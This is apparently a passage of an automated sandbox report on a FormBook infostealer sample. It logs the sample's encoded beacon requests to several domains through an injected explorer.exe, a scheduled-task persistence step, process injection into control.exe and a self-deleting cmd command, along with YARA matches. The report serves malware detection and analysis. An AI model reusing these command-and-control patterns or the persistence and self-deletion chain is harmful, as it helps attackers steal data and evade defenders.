                                            Sep 15, 2021 10:10:24.818169117 CEST  4165                OUT        GET /vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo HTTP/1.1
                                            Host: www.syzhtr.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:10:25.132343054 CEST  4165                IN         HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 15 Sep 2021 08:10:24 GMT
                                            Content-Type: text/html
                                            Content-Length: 146
                                            Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                            6           192.168.2.3  49790        34.102.136.180  80                C:\Windows\explorer.exe
                                            Timestamp                             kBytes transferred  Direction  Data
                                            Sep 15, 2021 10:10:30.286042929 CEST  4166                OUT        GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5 HTTP/1.1
                                            Host: www.tjandamber.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:10:30.401585102 CEST  4166                IN         HTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Wed, 15 Sep 2021 08:10:30 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6139efab-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                            7           192.168.2.3  49791        99.83.154.118   80                C:\Windows\explorer.exe
                                            Timestamp                             kBytes transferred  Direction  Data
                                            Sep 15, 2021 10:10:40.511245966 CEST  4167                OUT        GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0 HTTP/1.1
                                            Host: www.realstylecelebz.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:10:40.680717945 CEST  4168                IN         HTTP/1.1 403 Forbidden
                                            Date: Wed, 15 Sep 2021 08:10:40 GMT
                                            Content-Type: text/html
                                            Content-Length: 146
                                            Connection: close
                                            Server: nginx
                                            Vary: Accept-Encoding
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                            8           192.168.2.3  49792        34.98.99.30     80                C:\Windows\explorer.exe
                                            Timestamp                             kBytes transferred  Direction  Data
                                            Sep 15, 2021 10:10:45.754266024 CEST  4169                OUT        GET /vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo HTTP/1.1
                                            Host: www.dressmids.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:10:45.871160984 CEST  4169                IN         HTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Wed, 15 Sep 2021 08:10:45 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6139ed55-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                            9           192.168.2.3  49793        91.195.240.94   80                C:\Windows\explorer.exe
                                            Timestamp                             kBytes transferred  Direction  Data
                                            Sep 15, 2021 10:10:50.931049109 CEST  4170                OUT        GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd HTTP/1.1
                                            Host: www.discomountainkombucha.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Sep 15, 2021 10:10:50.960297108 CEST  4171                IN         HTTP/1.1 301 Moved Permanently
                                            Content-Type: text/html; charset=utf-8
                                            Location: https://www.discomountainkombucha.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd
                                            Date: Wed, 15 Sep 2021 08:10:50 GMT
                                            Content-Length: 179
                                            Connection: close
                                            Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 69 73 63 6f 6d 6f 75 6e 74 61 69 6e 6b 6f 6d 62 75 63 68 61 2e 63 6f 6d 2f 76 75 6a 61 2f 3f 53 72 4b 30 6d 3d 38 70 62 4c 75 38 6c 30 53 56 31 6c 6f 26 61 6d 70 3b 61 36 50 4c 64 48 36 3d 76 48 4b 68 44 66 64 7a 33 51 6a 79 6f 55 75 61 4b 30 66 4b 58 33 6b 36 76 4e 55 64 78 68 4e 30 30 67 44 6c 4a 54 32 68 54 66 58 4e 74 64 6f 42 66 57 57 64 4e 62 48 41 4d 6e 59 33 66 48 6e 6e 37 41 71 64 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                            Data Ascii: <a href="https://www.discomountainkombucha.com/vuja/?SrK0m=8pbLu8l0SV1lo&amp;a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd">Moved Permanently</a>.


                                            Behavior


                                            System Behavior

                                            General

                                            Start time:10:08:30
                                            Start date:15/09/2021
                                            Path:C:\Users\user\Desktop\tgamf4XuLa.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\tgamf4XuLa.exe'
                                            Imagebase:0x6a0000
                                            File size:548352 bytes
                                            MD5 hash:F8146A71DEDC3EEEAA1624D6832C39A4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            General

                                            Start time:10:08:34
                                            Start date:15/09/2021
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp'
                                            Imagebase:0x9f0000
                                            File size:185856 bytes
                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:10:08:35
                                            Start date:15/09/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6b2800000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:10:08:35
                                            Start date:15/09/2021
                                            Path:C:\Users\user\Desktop\tgamf4XuLa.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\tgamf4XuLa.exe
                                            Imagebase:0x860000
                                            File size:548352 bytes
                                            MD5 hash:F8146A71DEDC3EEEAA1624D6832C39A4
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:10:08:38
                                            Start date:15/09/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff714890000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Start time:10:09:17
                                            Start date:15/09/2021
                                            Path:C:\Windows\SysWOW64\control.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\control.exe
                                            Imagebase:0xe60000
                                            File size:114688 bytes
                                            MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Start time:10:09:26
                                            Start date:15/09/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'
                                            Imagebase:0xbd0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:10:09:26
                                            Start date:15/09/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6b2800000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
